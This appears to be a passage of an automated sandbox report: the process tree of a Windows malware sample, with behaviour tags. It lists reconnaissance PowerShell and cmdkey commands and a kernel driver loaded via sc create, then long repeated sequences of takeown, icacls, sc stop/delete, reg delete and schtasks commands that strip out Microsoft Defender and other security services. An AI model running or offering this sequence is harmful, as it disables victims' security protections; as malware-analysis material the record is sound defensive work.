                                                                                                            PID:4532
                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            "powershell" -Command "Get-VpnConnection | ConvertTo-Json"
                                                                                                            7⤵
                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                            PID:1324
                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            "powershell" -Command " $regPath = \"HKCU:\Software\Microsoft\Terminal Server Client\Servers\" if (Test-Path $regPath) { Get-ChildItem $regPath | ForEach-Object { $server = $_.PSChildName $usernamePath = Join-Path $_.PSPath \"UsernameHint\" $username = if (Test-Path $usernamePath) { (Get-ItemProperty -Path $usernamePath -Name \"(default)\" -ErrorAction SilentlyContinue).\"(default)\" } else { \"\" } Write-Output \"Server:$server,Username:$username\" } } "
                                                                                                            7⤵
                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                            • Hide Artifacts: Ignore Process Interrupts
                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                            PID:5728
                                                                                                          • C:\Windows\system32\cmdkey.exe
                                                                                                            "cmdkey" /list
                                                                                                            7⤵
                                                                                                              PID:4824
                                                                                                            • C:\Windows\system32\cmdkey.exe
                                                                                                              "cmdkey" /list:TERMSRV/69.48.201.74
                                                                                                              7⤵
                                                                                                                PID:3620
                                                                                                              • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                "wmic" /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName,pathToSignedProductExe,productState /Format:List
                                                                                                                7⤵
                                                                                                                  PID:2304
                                                                                                                • C:\Windows\system32\hostname.exe
                                                                                                                  "hostname"
                                                                                                                  7⤵
                                                                                                                    PID:3244
                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    "powershell" -Command "Get-WmiObject Win32_VideoController | ForEach-Object { $_.Name }"
                                                                                                                    7⤵
                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                    PID:2260
                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    "powershell" -Command "Get-NetAdapter | Where-Object { $_.Status -eq 'Up' -and $_.InterfaceDescription -notmatch 'virtual|loopback' } | Sort-Object -Property LinkSpeed -Descending | Select-Object -First 1 -ExpandProperty MacAddress"
                                                                                                                    7⤵
                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                    PID:5408
                                                                                                                  • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                    "wmic" /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName,pathToSignedProductExe,productState /Format:List
                                                                                                                    7⤵
                                                                                                                      PID:4472
                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                        8⤵
                                                                                                                          PID:5088
                                                                                                                      • C:\Windows\system32\netsh.exe
                                                                                                                        "netsh" advfirewall show allprofiles state
                                                                                                                        7⤵
                                                                                                                        • Modifies Windows Firewall
                                                                                                                        • Event Triggered Execution: Netsh Helper DLL
                                                                                                                        PID:5464
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\10412830101\apple.exe
                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\10412830101\apple.exe"
                                                                                                                      6⤵
                                                                                                                      • Checks computer location settings
                                                                                                                      • Executes dropped EXE
                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                      PID:396
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\261.exe
                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\261.exe"
                                                                                                                        7⤵
                                                                                                                        • Checks computer location settings
                                                                                                                        • Executes dropped EXE
                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                                        PID:4464
                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                          "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\ADA5.tmp\ADA6.tmp\ADA7.bat C:\Users\Admin\AppData\Local\Temp\261.exe"
                                                                                                                          8⤵
                                                                                                                            PID:1308
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\261.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\261.exe" go
                                                                                                                              9⤵
                                                                                                                              • Checks computer location settings
                                                                                                                              • Executes dropped EXE
                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                              PID:1880
                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\AE8F.tmp\AE90.tmp\AE91.bat C:\Users\Admin\AppData\Local\Temp\261.exe go"
                                                                                                                                10⤵
                                                                                                                                • Drops file in Program Files directory
                                                                                                                                PID:2944
                                                                                                                                • C:\Windows\system32\sc.exe
                                                                                                                                  sc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"
                                                                                                                                  11⤵
                                                                                                                                  • Launches sc.exe
                                                                                                                                  PID:4816
                                                                                                                                • C:\Windows\system32\sc.exe
                                                                                                                                  sc start ddrver
                                                                                                                                  11⤵
                                                                                                                                  • Launches sc.exe
                                                                                                                                  PID:2564
                                                                                                                                • C:\Windows\system32\timeout.exe
                                                                                                                                  timeout /t 1
                                                                                                                                  11⤵
                                                                                                                                  • Delays execution with timeout.exe
                                                                                                                                  PID:5520
                                                                                                                                • C:\Windows\system32\sc.exe
                                                                                                                                  sc stop ddrver
                                                                                                                                  11⤵
                                                                                                                                  • Launches sc.exe
                                                                                                                                  PID:4056
                                                                                                                                • C:\Windows\system32\sc.exe
                                                                                                                                  sc start ddrver
                                                                                                                                  11⤵
                                                                                                                                  • Launches sc.exe
                                                                                                                                  PID:2952
                                                                                                                                • C:\Windows\system32\takeown.exe
                                                                                                                                  takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
                                                                                                                                  11⤵
                                                                                                                                  • Possible privilege escalation attempt
                                                                                                                                  • Modifies file permissions
                                                                                                                                  PID:5028
                                                                                                                                • C:\Windows\system32\icacls.exe
                                                                                                                                  icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
                                                                                                                                  11⤵
                                                                                                                                  • Possible privilege escalation attempt
                                                                                                                                  • Modifies file permissions
                                                                                                                                  PID:4768
                                                                                                                                • C:\Windows\system32\sc.exe
                                                                                                                                  sc stop "WinDefend"
                                                                                                                                  11⤵
                                                                                                                                  • Launches sc.exe
                                                                                                                                  PID:3460
                                                                                                                                • C:\Windows\system32\sc.exe
                                                                                                                                  sc delete "WinDefend"
                                                                                                                                  11⤵
                                                                                                                                  • Launches sc.exe
                                                                                                                                  PID:1460
                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                  reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
                                                                                                                                  11⤵
                                                                                                                                    PID:3652
                                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                                    sc stop "MDCoreSvc"
                                                                                                                                    11⤵
                                                                                                                                      PID:2068
                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                      sc delete "MDCoreSvc"
                                                                                                                                      11⤵
                                                                                                                                      • Launches sc.exe
                                                                                                                                      PID:2160
                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                      reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
                                                                                                                                      11⤵
                                                                                                                                        PID:4032
                                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                                        sc stop "WdNisSvc"
                                                                                                                                        11⤵
                                                                                                                                        • Launches sc.exe
                                                                                                                                        PID:2844
                                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                                        sc delete "WdNisSvc"
                                                                                                                                        11⤵
                                                                                                                                          PID:4040
                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                          reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
                                                                                                                                          11⤵
                                                                                                                                            PID:3108
                                                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                                                            sc stop "Sense"
                                                                                                                                            11⤵
                                                                                                                                            • Launches sc.exe
                                                                                                                                            PID:5832
                                                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                                                            sc delete "Sense"
                                                                                                                                            11⤵
                                                                                                                                            • Launches sc.exe
                                                                                                                                            PID:2756
                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                            reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
                                                                                                                                            11⤵
                                                                                                                                              PID:5776
                                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                                              sc stop "wscsvc"
                                                                                                                                              11⤵
                                                                                                                                              • Launches sc.exe
                                                                                                                                              PID:5192
                                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                                              sc delete "wscsvc"
                                                                                                                                              11⤵
                                                                                                                                              • Launches sc.exe
                                                                                                                                              PID:4596
                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                              reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
                                                                                                                                              11⤵
                                                                                                                                                PID:4652
                                                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                                                sc stop "SgrmBroker"
                                                                                                                                                11⤵
                                                                                                                                                  PID:4772
                                                                                                                                                • C:\Windows\system32\sc.exe
                                                                                                                                                  sc delete "SgrmBroker"
                                                                                                                                                  11⤵
                                                                                                                                                    PID:4524
                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                    reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f
                                                                                                                                                    11⤵
                                                                                                                                                      PID:4752
                                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                                      sc stop "SecurityHealthService"
                                                                                                                                                      11⤵
                                                                                                                                                      • Launches sc.exe
                                                                                                                                                      PID:1980
                                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                                      sc delete "SecurityHealthService"
                                                                                                                                                      11⤵
                                                                                                                                                        PID:3664
                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                        reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f
                                                                                                                                                        11⤵
                                                                                                                                                          PID:5984
                                                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                                                          sc stop "webthreatdefsvc"
                                                                                                                                                          11⤵
                                                                                                                                                          • Launches sc.exe
                                                                                                                                                          PID:1696
                                                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                                                          sc delete "webthreatdefsvc"
                                                                                                                                                          11⤵
                                                                                                                                                          • Launches sc.exe
                                                                                                                                                          PID:1440
                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                          reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
                                                                                                                                                          11⤵
                                                                                                                                                            PID:5408
                                                                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                                                                            sc stop "webthreatdefusersvc"
                                                                                                                                                            11⤵
                                                                                                                                                            • Launches sc.exe
                                                                                                                                                            PID:432
                                                                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                                                                            sc delete "webthreatdefusersvc"
                                                                                                                                                            11⤵
                                                                                                                                                            • Launches sc.exe
                                                                                                                                                            PID:880
                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                            reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
                                                                                                                                                            11⤵
                                                                                                                                                              PID:224
                                                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                                                              sc stop "WdNisDrv"
                                                                                                                                                              11⤵
                                                                                                                                                              • Launches sc.exe
                                                                                                                                                              PID:1932
                                                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                                                              sc delete "WdNisDrv"
                                                                                                                                                              11⤵
                                                                                                                                                              • Launches sc.exe
                                                                                                                                                              PID:868
                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                              reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
                                                                                                                                                              11⤵
                                                                                                                                                                PID:5412
                                                                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                                                                sc stop "WdBoot"
                                                                                                                                                                11⤵
                                                                                                                                                                • Launches sc.exe
                                                                                                                                                                PID:5176
                                                                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                                                                sc delete "WdBoot"
                                                                                                                                                                11⤵
                                                                                                                                                                • Launches sc.exe
                                                                                                                                                                PID:3728
                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
                                                                                                                                                                11⤵
                                                                                                                                                                  PID:1280
                                                                                                                                                                • C:\Windows\system32\sc.exe
                                                                                                                                                                  sc stop "WdFilter"
                                                                                                                                                                  11⤵
                                                                                                                                                                  • Launches sc.exe
                                                                                                                                                                  PID:4264
                                                                                                                                                                • C:\Windows\system32\sc.exe
                                                                                                                                                                  sc delete "WdFilter"
                                                                                                                                                                  11⤵
                                                                                                                                                                  • Launches sc.exe
                                                                                                                                                                  PID:1156
                                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                                  reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f
                                                                                                                                                                  11⤵
                                                                                                                                                                    PID:1588
                                                                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                                                                    sc stop "SgrmAgent"
                                                                                                                                                                    11⤵
                                                                                                                                                                    • Launches sc.exe
                                                                                                                                                                    PID:5780
                                                                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                                                                    sc delete "SgrmAgent"
                                                                                                                                                                    11⤵
                                                                                                                                                                    • Launches sc.exe
                                                                                                                                                                    PID:4744
                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                    reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f
                                                                                                                                                                    11⤵
                                                                                                                                                                      PID:876
                                                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                                                      sc stop "MsSecWfp"
                                                                                                                                                                      11⤵
                                                                                                                                                                      • Launches sc.exe
                                                                                                                                                                      PID:4776
                                                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                                                      sc delete "MsSecWfp"
                                                                                                                                                                      11⤵
                                                                                                                                                                      • Launches sc.exe
                                                                                                                                                                      PID:5140
                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                      reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f
                                                                                                                                                                      11⤵
                                                                                                                                                                        PID:4764
                                                                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                                                                        sc stop "MsSecFlt"
                                                                                                                                                                        11⤵
                                                                                                                                                                        • Launches sc.exe
                                                                                                                                                                        PID:744
                                                                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                                                                        sc delete "MsSecFlt"
                                                                                                                                                                        11⤵
                                                                                                                                                                        • Launches sc.exe
                                                                                                                                                                        PID:3976
                                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                                        reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
                                                                                                                                                                        11⤵
                                                                                                                                                                          PID:688
                                                                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                                                                          sc stop "MsSecCore"
                                                                                                                                                                          11⤵
                                                                                                                                                                          • Launches sc.exe
                                                                                                                                                                          PID:1840
                                                                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                                                                          sc delete "MsSecCore"
                                                                                                                                                                          11⤵
                                                                                                                                                                          • Launches sc.exe
                                                                                                                                                                          PID:5380
                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                          reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
                                                                                                                                                                          11⤵
                                                                                                                                                                            PID:4724
                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                            schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
                                                                                                                                                                            11⤵
                                                                                                                                                                              PID:5012
                                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                                              schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
                                                                                                                                                                              11⤵
                                                                                                                                                                                PID:6096
                                                                                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
                                                                                                                                                                                11⤵
                                                                                                                                                                                  PID:4380
                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                  schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
                                                                                                                                                                                  11⤵
                                                                                                                                                                                    PID:1704
                                                                                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                                                                                    sc stop ddrver
                                                                                                                                                                                    11⤵
                                                                                                                                                                                    • Launches sc.exe
                                                                                                                                                                                    PID:2040
                                                                                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                                                                                    sc delete ddrver
                                                                                                                                                                                    11⤵
                                                                                                                                                                                    • Launches sc.exe
                                                                                                                                                                                    PID:1248
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\261.exe
                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\261.exe"
                                                                                                                                                                            7⤵
                                                                                                                                                                            • Checks computer location settings
                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                                                                                            PID:4708
                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                              "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\ADD4.tmp\ADD5.tmp\ADD6.bat C:\Users\Admin\AppData\Local\Temp\261.exe"
                                                                                                                                                                              8⤵
                                                                                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                                                                                              PID:3436
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\261.exe
                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\261.exe" go
                                                                                                                                                                                9⤵
                                                                                                                                                                                • Checks computer location settings
                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                PID:2412
                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                  "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\AE80.tmp\AE81.tmp\AE82.bat C:\Users\Admin\AppData\Local\Temp\261.exe go"
                                                                                                                                                                                  10⤵
                                                                                                                                                                                  • Drops file in Program Files directory
                                                                                                                                                                                  PID:1612
                                                                                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                                                                                    sc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"
                                                                                                                                                                                    11⤵
                                                                                                                                                                                    • Launches sc.exe
                                                                                                                                                                                    PID:3068
                                                                                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                                                                                    sc start ddrver
                                                                                                                                                                                    11⤵
                                                                                                                                                                                    • Launches sc.exe
                                                                                                                                                                                    PID:4264
                                                                                                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                                                                                                    timeout /t 1
                                                                                                                                                                                    11⤵
                                                                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                                                                    PID:3620
                                                                                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                                                                                    sc stop ddrver
                                                                                                                                                                                    11⤵
                                                                                                                                                                                    • Launches sc.exe
                                                                                                                                                                                    PID:2152
                                                                                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                                                                                    sc start ddrver
                                                                                                                                                                                    11⤵
                                                                                                                                                                                    • Launches sc.exe
                                                                                                                                                                                    PID:4268
                                                                                                                                                                                  • C:\Windows\system32\takeown.exe
                                                                                                                                                                                    takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
                                                                                                                                                                                    11⤵
                                                                                                                                                                                    • Possible privilege escalation attempt
                                                                                                                                                                                    • Modifies file permissions
                                                                                                                                                                                    PID:1608
                                                                                                                                                                                  • C:\Windows\system32\icacls.exe
                                                                                                                                                                                    icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
                                                                                                                                                                                    11⤵
                                                                                                                                                                                    • Possible privilege escalation attempt
                                                                                                                                                                                    • Modifies file permissions
                                                                                                                                                                                    PID:5380
                                                                                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                                                                                    sc stop "WinDefend"
                                                                                                                                                                                    11⤵
                                                                                                                                                                                    • Launches sc.exe
                                                                                                                                                                                    PID:4724
                                                                                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                                                                                    sc delete "WinDefend"
                                                                                                                                                                                    11⤵
                                                                                                                                                                                      PID:1304
                                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                                      reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
                                                                                                                                                                                      11⤵
                                                                                                                                                                                        PID:2700
                                                                                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                                                                                        sc stop "MDCoreSvc"
                                                                                                                                                                                        11⤵
                                                                                                                                                                                        • Launches sc.exe
                                                                                                                                                                                        PID:4380
                                                                                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                                                                                        sc delete "MDCoreSvc"
                                                                                                                                                                                        11⤵
                                                                                                                                                                                          PID:4132
                                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                                          reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
                                                                                                                                                                                          11⤵
                                                                                                                                                                                            PID:6032
                                                                                                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                                                                                                            sc stop "WdNisSvc"
                                                                                                                                                                                            11⤵
                                                                                                                                                                                            • Launches sc.exe
                                                                                                                                                                                            PID:2176
                                                                                                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                                                                                                            sc delete "WdNisSvc"
                                                                                                                                                                                            11⤵
                                                                                                                                                                                            • Launches sc.exe
                                                                                                                                                                                            PID:1752
                                                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                                                            reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
                                                                                                                                                                                            11⤵
                                                                                                                                                                                              PID:3376
                                                                                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                                                                                              sc stop "Sense"
                                                                                                                                                                                              11⤵
                                                                                                                                                                                              • Launches sc.exe
                                                                                                                                                                                              PID:1920
                                                                                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                                                                                              sc delete "Sense"
                                                                                                                                                                                              11⤵
                                                                                                                                                                                              • Launches sc.exe
                                                                                                                                                                                              PID:3640
                                                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                                                              reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
                                                                                                                                                                                              11⤵
                                                                                                                                                                                                PID:3056
                                                                                                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                                                                                                sc stop "wscsvc"
                                                                                                                                                                                                11⤵
                                                                                                                                                                                                • Launches sc.exe
                                                                                                                                                                                                PID:404
                                                                                                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                                                                                                sc delete "wscsvc"
                                                                                                                                                                                                11⤵
                                                                                                                                                                                                  PID:5652
                                                                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                                                                  reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
                                                                                                                                                                                                  11⤵
                                                                                                                                                                                                  • Modifies security service
                                                                                                                                                                                                  PID:4584
                                                                                                                                                                                                • C:\Windows\system32\sc.exe
                                                                                                                                                                                                  sc stop "SgrmBroker"
                                                                                                                                                                                                  11⤵
                                                                                                                                                                                                  • Launches sc.exe
                                                                                                                                                                                                  PID:4604
                                                                                                                                                                                                • C:\Windows\system32\sc.exe
                                                                                                                                                                                                  sc delete "SgrmBroker"
                                                                                                                                                                                                  11⤵
                                                                                                                                                                                                    PID:5040
                                                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                                                    reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f
                                                                                                                                                                                                    11⤵
                                                                                                                                                                                                      PID:4736
                                                                                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                                                                                      sc stop "SecurityHealthService"
                                                                                                                                                                                                      11⤵
                                                                                                                                                                                                      • Launches sc.exe
                                                                                                                                                                                                      PID:4576
                                                                                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                                                                                      sc delete "SecurityHealthService"
                                                                                                                                                                                                      11⤵
                                                                                                                                                                                                      • Launches sc.exe
                                                                                                                                                                                                      PID:3940
                                                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                                                      reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f
                                                                                                                                                                                                      11⤵
                                                                                                                                                                                                        PID:1220
                                                                                                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                                                                                                        sc stop "webthreatdefsvc"
                                                                                                                                                                                                        11⤵
                                                                                                                                                                                                        • Launches sc.exe
                                                                                                                                                                                                        PID:4980
                                                                                                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                                                                                                        sc delete "webthreatdefsvc"
                                                                                                                                                                                                        11⤵
                                                                                                                                                                                                        • Launches sc.exe
                                                                                                                                                                                                        PID:4548
                                                                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                                                                        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
                                                                                                                                                                                                        11⤵
                                                                                                                                                                                                          PID:5164
                                                                                                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                                                                                                          sc stop "webthreatdefusersvc"
                                                                                                                                                                                                          11⤵
                                                                                                                                                                                                          • Launches sc.exe
                                                                                                                                                                                                          PID:5336
                                                                                                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                                                                                                          sc delete "webthreatdefusersvc"
                                                                                                                                                                                                          11⤵
                                                                                                                                                                                                          • Launches sc.exe
                                                                                                                                                                                                          PID:4692
                                                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                                                          reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
                                                                                                                                                                                                          11⤵
                                                                                                                                                                                                            PID:5500
                                                                                                                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                                                                                                                            sc stop "WdNisDrv"
                                                                                                                                                                                                            11⤵
                                                                                                                                                                                                            • Launches sc.exe
                                                                                                                                                                                                            PID:4716
                                                                                                                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                                                                                                                            sc delete "WdNisDrv"
                                                                                                                                                                                                            11⤵
                                                                                                                                                                                                            • Launches sc.exe
                                                                                                                                                                                                            PID:3500
                                                                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                                                                            reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
                                                                                                                                                                                                            11⤵
                                                                                                                                                                                                              PID:4960
                                                                                                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                                                                                                              sc stop "WdBoot"
                                                                                                                                                                                                              11⤵
                                                                                                                                                                                                              • Launches sc.exe
                                                                                                                                                                                                              PID:4428
                                                                                                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                                                                                                              sc delete "WdBoot"
                                                                                                                                                                                                              11⤵
                                                                                                                                                                                                              • Launches sc.exe
                                                                                                                                                                                                              PID:4708
                                                                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                                                                              reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
                                                                                                                                                                                                              11⤵
                                                                                                                                                                                                                PID:4556
                                                                                                                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                                                                                                                sc stop "WdFilter"
                                                                                                                                                                                                                11⤵
                                                                                                                                                                                                                • Launches sc.exe
                                                                                                                                                                                                                PID:1020
                                                                                                                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                                                                                                                sc delete "WdFilter"
                                                                                                                                                                                                                11⤵
                                                                                                                                                                                                                • Launches sc.exe
                                                                                                                                                                                                                PID:4812
                                                                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f
                                                                                                                                                                                                                11⤵
                                                                                                                                                                                                                  PID:4636
                                                                                                                                                                                                                • C:\Windows\system32\sc.exe
                                                                                                                                                                                                                  sc stop "SgrmAgent"
                                                                                                                                                                                                                  11⤵
                                                                                                                                                                                                                  • Launches sc.exe
                                                                                                                                                                                                                  PID:2384
                                                                                                                                                                                                                • C:\Windows\system32\sc.exe
                                                                                                                                                                                                                  sc delete "SgrmAgent"
                                                                                                                                                                                                                  11⤵
                                                                                                                                                                                                                    PID:5352
                                                                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                    reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f
                                                                                                                                                                                                                    11⤵
                                                                                                                                                                                                                      PID:4868
                                                                                                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                                                                                                      sc stop "MsSecWfp"
                                                                                                                                                                                                                      11⤵
                                                                                                                                                                                                                      • Launches sc.exe
                                                                                                                                                                                                                      PID:4308
                                                                                                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                                                                                                      sc delete "MsSecWfp"
